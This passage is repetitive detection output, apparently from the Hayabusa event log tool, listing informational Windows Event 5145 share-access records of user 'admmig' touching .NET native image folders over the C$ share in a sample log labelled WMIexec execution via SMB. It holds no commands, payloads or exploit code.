10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 
